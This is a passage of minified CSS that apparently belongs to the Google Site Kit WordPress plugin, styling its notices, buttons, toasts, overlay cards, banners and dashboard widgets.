0.87))}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(:disabled){color:#7a1e00}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(:disabled){background-color:#ffc2ae}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:hover::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:focus:not(:disabled){color:#7a1e00}.googlesitekit-notice.googlesitekit-notice--new{background-color:#e3d1ff}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__icon,.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__content{color:#462083}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:not(:disabled){background-color:#462083}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--new .googlesitekit-notice__cta.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:not(:disabled){color:#462083}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(169,131,230,.6)}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:hover:not(:disabled){color:#462083}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(:disabled){background-color:#a983e6}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:hover::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--new .mdc-button--tertiary:focus:not(:disabled){color:#462083}.googlesitekit-notice-snackbar--bottom-right{bottom:0;gap:16px;position:fixed;right:0;z-index:9}@media(max-width: 600px){.googlesitekit-notice-snackbar--bottom-right{left:0;right:0;width:100%}}@media(max-width: 961px){.googlesitekit-notice-snackbar--bottom-right{right:24px}}@media(min-width: 1366px){.googlesitekit-notice-snackbar--bottom-right{right:calc(((100vw - 1366px) / 2) - (24px * 2))}}@media(max-width: 1500px){.googlesitekit-notice-snackbar--bottom-right{right:36px}}@media(min-width: 783px){.folded .googlesitekit-notice-snackbar--bottom-right{right:calc(((100vw - 1366px) / 2) + 16px)}}@media(min-width: 1366px){.folded .googlesitekit-notice-snackbar--bottom-right{right:calc(((100vw - 1366px) / 2) + 16px)}}@media(max-width: 1500px){.folded .googlesitekit-notice-snackbar--bottom-right{right:31.2px}}@media(max-width: 961px){.folded .googlesitekit-notice-snackbar--bottom-right{right:24px}}.googlesitekit-toast-notice{animation:toast-fade-in 250ms ease-in-out,toast-fade-out 250ms ease-in-out 5.25s;animation-fill-mode:forwards;border-radius:8px;bottom:16px;left:16px;position:fixed;right:16px;z-index:1}@media(min-width: 600px){.googlesitekit-toast-notice{bottom:45px;left:auto;right:45px}}@keyframes toast-fade-in{from{opacity:0}to{opacity:1}}@keyframes toast-fade-out{from{opacity:1}to{opacity:0}}.googlesitekit-overlay-card{background-color:#fff;border-radius:16px;display:flex;flex-direction:column;margin:16px}@media(min-width: 600px){.googlesitekit-overlay-card{bottom:36px;box-shadow:0 8px 24px 0 rgba(0,0,0,.25);inset-inline-end:36px;margin:0;max-width:348px;position:fixed;z-index:9970}}@media(min-width: 1440px){.googlesitekit-overlay-card{inset-inline-end:calc(((100vw - 1366px) / 2))}}@media(min-width: 1500px){.googlesitekit-overlay-card{inset-inline-end:calc(((100vw - 1366px) / 2) - (24px))}}.googlesitekit-overlay-card .googlesitekit-overlay-card__graphic{overflow:hidden;text-align:center}.googlesitekit-overlay-card .googlesitekit-overlay-card__graphic svg{display:block;height:auto;max-width:100%}.googlesitekit-overlay-card .googlesitekit-overlay-card__body{color:#161b18;padding:16px}.googlesitekit-overlay-card .googlesitekit-overlay-card__body .googlesitekit-overlay-card__badge{margin-bottom:8px}.googlesitekit-overlay-card .googlesitekit-overlay-card__body .googlesitekit-overlay-card__title{margin:0 0 10px}.googlesitekit-overlay-card .googlesitekit-overlay-card__body .googlesitekit-overlay-card__description{font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;margin:0}@media(min-width: 600px){.googlesitekit-overlay-card .googlesitekit-overlay-card__body{padding:24px}.googlesitekit-overlay-card .googlesitekit-overlay-card__body .googlesitekit-typography.googlesitekit-overlay-card__title{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:22px;font-weight:400;letter-spacing:unset;line-height:1.27;margin:0 0 5px}.googlesitekit-overlay-card .googlesitekit-overlay-card__body .googlesitekit-overlay-card__description{font-size:14px;font-weight:400;letter-spacing:.25px;line-height:1.43}}.googlesitekit-overlay-card .googlesitekit-overlay-card__actions{align-items:center;display:flex;flex-direction:row-reverse;gap:8px;justify-content:flex-end;padding:16px;padding-top:0}@media(min-width: 600px){.googlesitekit-overlay-card .googlesitekit-overlay-card__actions{flex-direction:row;padding:24px;padding-top:0}}.googlesitekit-overlay-card .googlesitekit-overlay-card__actions .mdc-button--raised{gap:0 6px}@media(min-width: 1440px){.folded .googlesitekit-overlay-card{inset-inline-end:calc(((100vw - 1366px + 124px ) / 2))}}@media(min-width: 1500px){.folded .googlesitekit-overlay-card{inset-inline-end:calc(((100vw - 1366px + 124px ) / 2) - (24px))}}.googlesitekit-plugin .googlesitekit-banner-notification{width:100%}.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description,.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description p{font-size:12px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description,.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description p{font-size:14px}}.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description a,.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__description p a{color:unset;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--info{background-color:#f1fff7}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--error{background-color:#fff8f6}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--error .googlesitekit-banner__cta:not(:disabled){background-color:#ac4220}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning{background-color:#fffaef}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action{margin-bottom:0}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):not(:disabled){background-color:#4e3300}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary)::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary)::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary)::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary)::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):hover::before{opacity:.08}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary).mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary):not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button:not(.mdc-button--tertiary).mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:not(:disabled){color:#4e3300}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(225,177,85,.6)}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:hover:not(:disabled){color:#4e3300}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(:disabled){background-color:#e1b155}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active::after,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active::after,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:hover::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:focus:not(:disabled){color:#4e3300}.googlesitekit-plugin .googlesitekit-banner-notification.googlesitekit-banner-notification--warning .googlesitekit-notice__action .mdc-button--tertiary:not(:disabled){background-color:unset}.googlesitekit-plugin .googlesitekit-banner-notification .mdc-layout-grid{padding:0}.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner{background-color:unset}.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-banner__additional-description{margin-top:10px}.googlesitekit-plugin .googlesitekit-banner-notification .googlesitekit-preview-block__wrapper{margin-bottom:10px}.googlesitekit-widget-area--composite .googlesitekit-widget-area-widgets{background:#fff}@media(min-width: 961px){.googlesitekit-widget-area-header{margin-bottom:24px;margin-bottom:var(--mdc-layout-grid-margin-desktop, 24px)}}@media(min-width: 601px)and (max-width: 960px){.googlesitekit-widget-area-header{margin-bottom:16px;margin-bottom:var(--mdc-layout-grid-margin-tablet, 16px)}}@media(max-width: 600px){.googlesitekit-widget-area-header{margin-bottom:16px;margin-bottom:var(--mdc-layout-grid-margin-phone, 16px)}}.googlesitekit-widget-area-header .googlesitekit-widget-area-header__title{color:#161b18;font-weight:500;margin:0 0 .125rem}.googlesitekit-widget-area-header .googlesitekit-widget-area-header__subtitle{color:#161b18;display:flex;flex-grow:1;justify-content:space-between;margin:0}@media(min-width: 600px){.googlesitekit-widget-area-header .googlesitekit-widget-area-header__subtitle{display:block}}.googlesitekit-widget-area-header .googlesitekit-widget-area-header__subtitle .googlesitekit-new-badge{height:24px;margin-left:14px}.googlesitekit-widget-area-header .googlesitekit-widget-area-header__details{align-items:flex-start;display:flex;justify-content:space-between}.googlesitekit-widget-area-header .googlesitekit-widget-area__cta-link{align-items:center;display:flex;font-size:14px;font-weight:500;line-height:1.43;padding-left:6px;white-space:nowrap}.googlesitekit-widget-area-footer__cta{font-size:14px;font-weight:500;margin:12px 0}.googlesitekit-widget-context{padding-bottom:10px;padding-top:10px}@media screen and (min-width: 601px){.googlesitekit-widget-context .mdc-layout-grid{padding:24px}}.googlesitekit-widget-context--last{min-height:80vh}@media screen and (min-height: 1200px){.googlesitekit-widget-context--last{min-height:100vh}}.googlesitekit-plugin .googlesitekit-widget{background:#fff;border-radius:16px;display:flex;flex-direction:column;height:100%;overflow:hidden;padding:0}.googlesitekit-plugin .googlesitekit-widget .googlesitekit-widget__header--cta{margin:16px 0 0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget .googlesitekit-widget__header--cta{margin:0}}.googlesitekit-plugin .googlesitekit-widget .googlesitekit-widget__header--cta .googlesitekit-cta-link{font-size:16px;font-weight:400;letter-spacing:.5px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-widget__header,.googlesitekit-plugin .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget__footer{padding:24px;padding:var(--mdc-layout-grid-margin-desktop, 24px)}}@media(min-width: 601px)and (max-width: 960px){.googlesitekit-plugin .googlesitekit-widget__header,.googlesitekit-plugin .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget__footer{padding:16px;padding:var(--mdc-layout-grid-margin-tablet, 16px)}}@media(max-width: 600px){.googlesitekit-plugin .googlesitekit-widget__header,.googlesitekit-plugin .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget__footer{padding:16px;padding:var(--mdc-layout-grid-margin-phone, 16px)}}.googlesitekit-plugin .googlesitekit-widget__header{border-bottom:1px solid #ebeef0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget__header{display:flex;justify-content:space-between}}.googlesitekit-plugin .googlesitekit-widget__header .googlesitekit-typography.googlesitekit-widget__header-title{font-size:16px;line-height:1.25;margin:0}.googlesitekit-plugin .googlesitekit-widget__body{flex:1}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--no-padding .googlesitekit-widget__body{padding:0}.googlesitekit-plugin .googlesitekit-widget__footer{border-top:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-widget--hidden-footer .googlesitekit-widget__footer{visibility:hidden}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--footer-v2 .googlesitekit-widget__footer{border-top:0;display:flex;justify-content:flex-end}.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget{background:transparent;box-shadow:none}.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__header,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__footer{padding-left:0;padding-right:0}.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__header:first-child,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__body:first-child,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__footer:first-child{padding-top:0}.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__header:last-child,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__body:last-child,.googlesitekit-plugin .googlesitekit-widget-area--composite .googlesitekit-widget .googlesitekit-widget__footer:last-child{padding-bottom:0}.googlesitekit-plugin 